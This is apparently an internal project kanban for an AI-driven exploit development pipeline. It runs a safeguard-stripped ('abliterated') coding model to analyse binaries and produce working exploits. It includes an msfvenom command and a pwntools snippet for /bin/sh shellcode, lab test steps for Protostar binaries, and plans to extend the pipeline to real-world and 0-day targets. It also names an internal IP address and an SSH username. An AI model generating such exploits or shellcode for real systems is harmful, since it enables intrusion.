GreySec RED — Master Kanban
Product: GreySec Exploit Development Pipeline
Type: Internal Build Project
Status: BUILDING
Updated: 2026-05-07
Parent debrief: ~/greysec/ops/debriefs/exploit-lab-2026-05-07.md
Background
GreySec RED is an AI-augmented reverse engineering and exploit development lab. It takes a binary target, runs it through a two-agent pipeline (RE Agent + Exploit Writer), and produces a complete vulnerability brief plus a working exploit.
Architecture:
Binary Target → RE Agent (Kali + qwen2.5-coder:abliterator)
↓
analysis.md + struct.json
↓
Exploit Writer (Kali + qwen2.5-coder:abliterator)
↓
exploit.py + shellcode.bin + test-results.md
Current status: PARTIALLY OPERATIONAL. Works on easy binaries (stack0, stack1, format0). Fails silently on harder ones (heap0). Validation layer missing.
Pipeline Definition
What the product IS: Drop a binary. Get a vulnerability brief, a working exploit, and shellcode. No manual RE required.
What the client receives:
- analysis.md: full vulnerability analysis (vulnerable function, offset calculation, attack vector, constraints)
- struct.json: structured vulnerability data (offset, return address, bad chars, suggested shellcode type)
- exploit.py: working pwntools exploit targeting the binary directly
- shellcode.bin: position-independent shellcode for the target architecture
- test-results.md: proof the exploit was run against the real binary and worked
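A minimal sketch of how the struct.json deliverable could be checked for shape. The field names below are hypothetical; the source only says the file carries the offset, return address, bad chars, and suggested shellcode type.

```python
import json

# Hypothetical field names and types, assumed for illustration only.
REQUIRED_FIELDS = {
    "offset": int,
    "return_address": str,   # hex string, e.g. "0x08048464"
    "bad_chars": list,       # e.g. ["0x00", "0x0a"]
    "shellcode_type": str,
}

def validate_struct(text):
    """Return a list of problems found in a struct.json document (empty if none)."""
    try:
        data = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"not valid JSON: {exc}"]
    if not isinstance(data, dict):
        return ["top level must be a JSON object"]
    problems = []
    for name, expected in REQUIRED_FIELDS.items():
        if name not in data:
            problems.append(f"missing field: {name}")
        elif isinstance(data[name], bool) or not isinstance(data[name], expected):
            problems.append(f"{name} should be {expected.__name__}")
    return problems
```

An empty list means the file has the assumed shape; it says nothing about whether the values are correct for the target.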
Target buyer:
- Security teams building internal red team toolchains
- Exploit developers who need fast turnaround on binary targets
- CTF players and competitive hacking teams needing rapid challenge solutions
- Security researchers analyzing third-party binaries for CVEs
Current State
What Works
- RE Agent on stack0, stack1, format0: analysis.md + struct.json correct, exploit.py written and correct
- Agent scripts functional: re-agent.sh and exploit-writer.sh exist and execute
- Directory structure clean: reports/, exploits/, agents/ properly organized
- Model access confirmed: Kali container can reach MacBook Ollama at 100.127.137.64 (when SSH works)
- Exploit approach correct: pwntools process/stdin for stack0, argv for stack1
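The two delivery modes named in the last bullet (stdin for stack0, argv for stack1) can be sketched with the standard library alone. This is an illustration under assumptions, not the pipeline's code: the function name and `mode` parameter are hypothetical, and the real exploits use pwntools rather than subprocess.

```python
import subprocess

def deliver(cmd, payload, mode, timeout=5):
    """Run cmd once, passing payload on stdin or as the last argv entry."""
    if mode == "stdin":
        return subprocess.run(cmd, input=payload, capture_output=True, timeout=timeout)
    if mode == "argv":
        # argv strings are NUL-terminated, so a payload containing 0x00 cannot be passed this way.
        if b"\x00" in payload:
            raise ValueError("argv payloads cannot contain NUL bytes")
        return subprocess.run(cmd + [payload], capture_output=True, timeout=timeout)
    raise ValueError(f"unknown delivery mode: {mode}")
```

The NUL check matters when the target address contains a zero byte: such a payload can go over stdin but not through argv.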
What Is Broken or Missing
| # | Issue | Severity | Fix Time | Status |
|---|---|---|---|---|
| 1 | re-agent.sh has no validation gate; if struct.json is not produced, exploit-writer.sh runs blind | CRITICAL | 30 min | Script updated, needs testing |
| 2 | exploit-writer.sh has no test loop; exploit.py never run against real binary | CRITICAL | 30 min | Script updated, needs testing |
| 3 | No gbrain logging hooks; pipeline findings not captured to institutional knowledge | HIGH | 15 min | Script updated, needs testing |
| 4 | No TIME-LOG hook; ~2.5 hours of AI time completely untracked | HIGH | 15 min | Script updated, needs testing |
| 5 | heap0 RE Agent failed silently; no struct.json, exploit written from guesswork | HIGH | 20 min | Needs re-run with fixed re-agent.sh |
| 6 | No shellcode.bin produced for any binary; referenced in scripts, never built | MEDIUM | 30 min | Needs msfvenom or pwntools asm step |
| 7 | MacBook SSH blocked (password rejected twice); abliterator model unreachable | CRITICAL | TBD | Adam needs to fix SSH or Tailscale |
| 8 | No test-results.md for any binary; "verified" in kanban was false | HIGH | n/a | Fixes #1 and #2 address this |
| 9 | Skill file greysec-exploit-lab does not exist | MEDIUM | 1 hour | Needs writing |
| 10 | exploit.py for vuln_test uses nonstandard "launcher" approach | MEDIUM | 30 min | Needs rewrite as direct pwntools exploit |
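For issue 4, a timing hook could look roughly like the sketch below. The log path, the tab-separated line format, and the `time_logged` name are all assumptions; the source does not describe what a TIME-LOG entry looks like.

```python
import time
from contextlib import contextmanager
from pathlib import Path

@contextmanager
def time_logged(log_path, target, stage):
    """Append one 'target<TAB>stage<TAB>seconds' line when the wrapped block ends."""
    start = time.monotonic()
    try:
        yield
    finally:
        # Runs on success and on failure, so failed runs are tracked too.
        elapsed = time.monotonic() - start
        with Path(log_path).open("a") as fh:
            fh.write(f"{target}\t{stage}\t{elapsed:.1f}s\n")
```

Wrapping each stage in `with time_logged(...)` records the time even when the stage raises, which is the case that went untracked.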
BOARD
BACKLOG
- Write greysec-exploit-lab skill (standalone operational procedure)
- Build shellcode.bin generation step (msfvenom or pwntools asm) for each binary
- Rewrite vuln_test exploit.py as direct pwntools targeting, not C tempfile launcher
- Add gbrain knowledge logging for each completed target (pipeline should auto-log findings)
- Benchmark: how fast is the pipeline on intermediate binaries (heap2/3, format1-4, net0-4)?
- Windows DLL analysis path — can the pipeline handle PE/DLL analysis?
- ARM/IoT binary path — what changes needed for non-x86 targets?
- Multi-arch support: x86, x64, ARM, MIPS — shellcode generation per arch
IN PROGRESS
- Validate updated re-agent.sh and exploit-writer.sh on heap0
- Unblock MacBook SSH (Adam's decision needed)
VALIDATING
(empty — waiting for heap0 re-run and MacBook SSH fix)
DONE
- Agent pipeline architecture (RE Agent + Exploit Writer, two-stage)
- Agent scripts written (re-agent.sh, exploit-writer.sh)
- Directory structure created (reports/, exploits/, agents/)
- Protostar binaries processed: stack0, stack1, format0 (3 of 5 complete; no test-results.md yet, see issue #8)
- Agent scripts updated with validation gates, gbrain hooks, TIME-LOG hooks
BLOCKED
- MacBook SSH — abliterator model unreachable, all RE runs on cloud fallback
- heap0 re-run — blocked by MacBook SSH (RE Agent works better with abliterator model)
Technical Fix Tasks
Task 1: Validate re-agent.sh + exploit-writer.sh on heap0 (HIGH PRIORITY)
What: The updated scripts have validation gates and test loops. Run them against heap0 to confirm they work.
Test procedure:
cd ~/greysec/engagements/exploit-lab
./agents/re-agent.sh heap0 /opt/protostar/bin/heap0
# Expected: analysis.md + struct.json produced
# Expected: FAIL and exit 1 if struct.json missing
./agents/exploit-writer.sh heap0
# Expected: exploit.py written
# Expected: exploit.py run against real binary
# Expected: test-results.md with PASS or FAIL
Acceptance criteria:
- re-agent.sh exits 1 if struct.json not produced
- exploit-writer.sh refuses to run if struct.json missing
- exploit.py is run and result captured in test-results.md
- Both scripts log to gbrain and TIME-LOG
Who: qwen2.5-coder:14b (can be self-verified)
Time: 20-30 minutes
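The gate in the first two acceptance criteria can be sketched as a small check that returns a shell-style exit code. This is a Python illustration under assumptions: the real gate lives in re-agent.sh, and the per-target report directory is hypothetical.

```python
import json
import sys
from pathlib import Path

def gate(report_dir):
    """Return 0 if report_dir holds a parseable, non-empty struct.json, else 1."""
    path = Path(report_dir) / "struct.json"
    if not path.is_file():
        print(f"FAIL: {path} was not produced", file=sys.stderr)
        return 1
    try:
        data = json.loads(path.read_text())
    except (OSError, ValueError) as exc:  # JSONDecodeError is a ValueError
        print(f"FAIL: {path} is unreadable: {exc}", file=sys.stderr)
        return 1
    if not isinstance(data, dict) or not data:
        print(f"FAIL: {path} is empty or not a JSON object", file=sys.stderr)
        return 1
    return 0
```

A caller would pass the result to `sys.exit()`, so a missing or broken struct.json stops the run before the exploit-writing stage starts.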
Task 2: Fix MacBook SSH Access (CRITICAL — Adam's Decision Needed)
What: Password SSH to adamsloggett@100.127.137.64 was rejected twice. The abliterator model lives only on the MacBook.
Option A — Fix the password:
The current Mac password (rotated 2026-05-05) is [REDACTED]. Try from the Linux host directly to confirm whether this is a Tailscale SSH issue or a password issue:
ssh adamsloggett@100.127.137.64
# from the Linux host — not through Tailscale if possible
Option B — Use Tailscale SSH instead:
Tailscale SSH (tailscale ssh adamsloggett@100.127.137.64) skips password auth: the connection is authenticated by tailnet identity and authorized by the tailnet's SSH access rules. This requires:
# On the Mac: enable Tailscale SSH
tailscale set --ssh
# On the Linux host: use Tailscale hostname
ssh adamsloggett@macbook-pro-2
# Or: ssh -o "ProxyCommand tailscale nc %h %p" adamsloggett@100.127.137.64
Option C — Copy the abliterator model to Linux:
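If the MacBook stays unreachable, host huihui_ai/qwen2.5-coder-abliterate:latest (the model served by the MacBook's Ollama) on Linux instead. With the MacBook offline the model cannot be copied from it, so this means pulling the same tag onto the Linux host, assuming it is available from the Ollama registry. This requires enough disk space (~10GB).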
Who: Adam needs to pick an option and act. Hermes will execute once the path is confirmed.
Time: Option A or B: ~15 minutes. Option C: ~30 minutes.
Task 3: Re-Run heap0 with Fixed Scripts
What: heap0's RE Agent failed silently in the original run. With the validation gate in place, re-run it.
Procedure:
cd ~/greysec/engagements/exploit-lab
./agents/re-agent.sh heap0 /opt/protostar/bin/heap0
# Should produce struct.json or FAIL
./agents/exploit-writer.sh heap0
# Should produce tested exploit.py
Acceptance criteria:
- struct.json produced for heap0
- analysis.md accurate (verify offset and WINNER address)
- exploit.py written and tested — PASS in test-results.md
Who: qwen2.5-coder:14b
Time: 20-30 minutes
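The "written and tested" criterion amounts to running the exploit once and recording a verdict. A minimal sketch follows, assuming a hypothetical success marker in the output and a one-line-per-run format for test-results.md; neither is specified in the source.

```python
import subprocess
from datetime import datetime, timezone
from pathlib import Path

SUCCESS_MARKER = b"PWNED"  # hypothetical: whatever output proves the exploit landed

def run_and_record(exploit_cmd, results_path, timeout=30):
    """Run the exploit once and append a PASS/FAIL line to results_path."""
    try:
        proc = subprocess.run(exploit_cmd, capture_output=True, timeout=timeout)
        passed = SUCCESS_MARKER in proc.stdout + proc.stderr
        detail = f"exit code {proc.returncode}"
    except subprocess.TimeoutExpired:
        passed, detail = False, f"timed out after {timeout}s"
    except OSError as exc:
        passed, detail = False, f"could not start: {exc}"
    verdict = "PASS" if passed else "FAIL"
    stamp = datetime.now(timezone.utc).isoformat(timespec="seconds")
    with Path(results_path).open("a") as fh:
        fh.write(f"- {stamp} {verdict} ({detail})\n")
    return passed
```

Timeouts and launch errors are recorded as FAIL rather than raised, so every run leaves an entry and a silent failure is not possible.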
Task 4: Shellcode Generation Step
What: No shellcode.bin has ever been produced. The agent scripts reference it but the step doesn't exist.
Approach: Use msfvenom or pwntools' asm() to generate shellcode based on the binary architecture.
For Protostar binaries (x86, static):
# Example for stack0 (calls execve("/bin/sh"))
msfvenom -p linux/x86/exec CMD=/bin/sh -f raw -a x86 --platform linux -o shellcode.bin
Or via pwntools in exploit.py:
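from pwn import asm, context, shellcraft
context.update(arch="i386", os="linux")  # Protostar binaries are 32-bit x86
shellcode = asm(shellcraft.i386.linux.sh())  # raw bytes of an execve("/bin/sh") stub
open("shellcode.bin", "wb").write(shellcode)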
Files to touch: exploit-writer.sh — add shellcode generation as a post-exploit step.
Who: qwen2.5-coder:14b
Time: 30 minutes to add the step and test on stack0
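One way to make the msfvenom step architecture-aware is to build the command line from a small lookup table. This sketch only constructs the argument list and does not run msfvenom. The function name and table are hypothetical, and only x86 and x64 are mapped; the ARM and MIPS entries from the backlog are left out rather than guessed.

```python
import shlex

# Architecture -> msfvenom payload. Only the two Linux exec payloads are listed.
PAYLOADS = {
    "x86": "linux/x86/exec",
    "x64": "linux/x64/exec",
}

def msfvenom_command(arch, out_path="shellcode.bin", cmd="/bin/sh"):
    """Build the msfvenom argument list that writes raw shellcode to out_path."""
    if arch not in PAYLOADS:
        raise ValueError(f"no payload mapped for architecture: {arch}")
    return [
        "msfvenom", "-p", PAYLOADS[arch], f"CMD={cmd}",
        "-f", "raw", "-a", arch, "--platform", "linux", "-o", out_path,
    ]

print(shlex.join(msfvenom_command("x86")))
```

Returning a list instead of a string lets the caller pass it to a process runner without shell quoting problems.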
Task 5: Rewrite vuln_test exploit.py (MEDIUM)
What: The current vuln_test exploit.py uses a nonstandard "launcher" approach (compiles a C helper program inside a Python tempfile). Rewrite it as a direct pwntools process targeting the actual /tmp/vuln_test binary.
Why: The agent contract specifies a pwntools process/exploit that targets the binary directly. The launcher approach is a workaround, which suggests the model did not fully understand how to exploit the binary through the standard pwntools interface.
Who: qwen2.5-coder:14b
Time: 30 minutes
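In the direct approach the payload is just bytes built in Python and handed to the target process, with no compiled helper. A minimal sketch of that payload step for a 32-bit little-endian target follows. The function name and parameters are hypothetical, and the offset and address would come from struct.json, not from this example.

```python
import struct

def build_payload(offset, target_address, bad_chars=b""):
    """Pad with 'A' up to the overwritten pointer, then append a 32-bit LE address."""
    if offset < 0:
        raise ValueError("offset must be non-negative")
    payload = b"A" * offset + struct.pack("<I", target_address)
    hits = sorted(set(payload) & set(bad_chars))
    if hits:
        raise ValueError("payload contains bad chars: " + ", ".join(f"{b:#04x}" for b in hits))
    return payload
```

With pwntools, the resulting bytes would typically be sent to a process opened directly on the binary. The bad-char check catches addresses that the target's input routine would truncate.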
Capability Expansion Tasks
Tier 1: Beginner (WHAT EXISTS)
Binaries: stack0, stack1, format0 (Protostar)
Skills needed: Basic buffer overflow, format string exploitation
Time per binary: ~20-30 minutes with pipeline
Status: OPERATIONAL (3 of 3 complete)
Tier 2: Intermediate (IN BACKLOG)
Binaries: heap2, heap3, format1-4, net0-4 (Protostar)
Skills needed: Heap grooming, UAF, fastbin dup, format string chaining
Time per binary: ~40-60 minutes with pipeline
What needs building: None (same pipeline, harder targets)
Tier 3: Advanced (IN BACKLOG)
Binaries: Fusion (Web, HTTP, SQL, etc.; advanced Protostar)
Skills needed: ROP chains, ASLR/DEP bypass, heap techniques
What needs building: ROP gadget finder integration, libc database lookup
Time per binary: ~60-90 minutes with pipeline
Tier 4: Elite (FUTURE)
Targets: Real-world binaries, DLL analysis, kernel modules
Skills needed: Full RE, CVE research, kernel exploitation
What needs building: Windows VM path, DLL analysis pipeline, kernel debug setup
Product Tiers (Internal Planning)
| Tier | Target | Output | Complexity | Time |
|---|---|---|---|---|
| Beginner | stack/heap/format (Protostar) | analysis + exploit | Easy | 20-30 min |
| Intermediate | Protostar advanced, VWA | analysis + exploit + ROP | Medium | 40-60 min |
| Advanced | real-world binaries | analysis + struct.json + suggested exploit path | Hard | 60-120 min |
| Elite | 0-day research | analysis only (no exploit — model limitations) | Expert | TBD |
Definition of Done
GreySec RED is operational when:
- re-agent.sh validates struct.json and exits non-zero if missing
- exploit-writer.sh tests exploit.py against real binary and reports PASS/FAIL
- gbrain logging is wired and firing after each completed target
- TIME-LOG is updated after each pipeline run
- heap0 re-run produces correct struct.json (validated against known values: offset 80, WINNER 0x08048464)
- shellcode.bin is generated for at least stack0
- All 5 lab binaries (Protostar stack0, stack1, format0, heap0, plus vuln_test) have PASS in test-results.md
- MacBook SSH is unblocked and abliterator model is reachable
- Skill file greysec-exploit-lab exists and documents operational procedure
- At least one intermediate binary (heap2 or format1) has been processed end-to-end and PASS
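The heap0 criterion above compares struct.json with known values (offset 80, WINNER 0x08048464). A minimal sketch of that comparison follows. The key names `offset` and `winner_address` are assumptions, and numeric fields are accepted either as integers or as strings such as "0x08048464".

```python
# Known-good values taken from the checklist; the key names are hypothetical.
HEAP0_EXPECTED = {"offset": 80, "winner_address": 0x08048464}

def as_int(value):
    """Accept an int, or a string such as "80" or "0x08048464"."""
    return value if isinstance(value, int) else int(str(value), 0)

def mismatches(struct_data, expected):
    """Return one message per field that is missing, non-numeric, or wrong."""
    problems = []
    for key, want in expected.items():
        if key not in struct_data:
            problems.append(f"{key}: missing")
            continue
        try:
            got = as_int(struct_data[key])
        except ValueError:
            problems.append(f"{key}: not a number ({struct_data[key]!r})")
            continue
        if got != want:
            problems.append(f"{key}: expected {want:#x}, got {got:#x}")
    return problems
```

An empty result means the RE Agent's output matches the reference values; anything else should block the PASS.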
DEBT (Action Items from This Kanban)
| Action Item | Priority | Status | Notes |
|---|---|---|---|
| Validate updated scripts on heap0 | CRITICAL | open | Confirm validation gates work |
| Unblock MacBook SSH | CRITICAL | blocked | Adam's decision needed |
| Re-run heap0 with fixed scripts | HIGH | open | After Task 1 |
| Build shellcode.bin generation step | HIGH | open | msfvenom or pwntools asm |
| Rewrite vuln_test exploit.py | MEDIUM | open | Direct pwntools approach |
| Test intermediate binaries (heap2, format1) | MEDIUM | open | Pipeline validation |
| Write greysec-exploit-lab skill | MEDIUM | open | Operational docs |
| Add ROP gadget finder for advanced tier | LOW | backlog | Future |
| Validate pipeline against Windows DLL | LOW | backlog | Future |